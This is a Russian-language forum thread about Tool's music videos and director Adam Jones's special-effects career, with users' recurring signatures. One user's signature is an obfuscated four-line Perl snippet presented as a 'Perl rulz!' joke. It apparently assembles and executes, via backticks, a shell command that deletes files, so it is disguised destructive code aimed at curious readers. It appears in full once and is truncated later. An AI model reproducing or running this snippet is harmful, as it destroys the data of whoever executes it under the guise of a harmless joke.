ALuserX
А что это за картинка? _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
я типа помню чтоль где ее год назад брал?)) ну мне показалось что на кинона похожи сыкуны) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
"PARABOLA " by TOOL Directed by Adam Jones _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Ноя 25, 2007 4:52 am Заголовок сообщения:
Schism
Режиссер: Adam Jones;
Aenema
Stinkfist
Prison Sex
Sober
Режиссеры: Adam Jones и Fred Stuhr;
Hush
Режиссер: Ken Andrews;
После окончания учебы около двух лет он проработал в ?The Character Shop? у Рика Лаззарини (Rick Lazzarini) и в ТВ-шоу ?Monsters?. Адам разработал и изготовил нескольких монстров, среди которых к примеру, голова зомби на пике, использованую в фильме ?Охотники за привидениями 2? (Ghostbusters-2) (1989 г.). Также участвовал в создании нескольких рекламных роликов. Так, в рекламе краски ?Olympic? Адам готовил грим Альберта Эйнштейна, в рекламе Duracell - боксеров и такси. Позже, в фильме ?Кошмар на улице вязов-5? (A Nightmare on Elm Street 5: The Dream Child) (1989 г.) - Адам гримировал ужасного Фредди Крюгера. В дальнейшем, работая уже у Стена Винстона (Stan Winston) над фильмом ?Хищник-2? (Predator-2) (1990 г.), он изготовил уникальный череп инопланетянина. Известно также, что Адам работал над художественными / специальными эффектами для таких фильмов, как ?Бэтмэн возвращается? (Batman Returns) (1992 г.), ?Парк Юрского периода? (Jurassic Park) (1993 г.) и ?Терминатор-2? (Terminator 2: Judgment Day) (1991 г.). _________________ Fortuna non penis in manus non recipe
а нельзя прямо мне сказать?) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Что-то ты непонятно как-то выразился. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вс Фев 24, 2008 12:58 am Заголовок сообщения:
Ты не прямо говоришь. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вт Мар 25, 2008 6:00 pm Заголовок сообщения:
Поставил на скачку.Хе,всего час. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.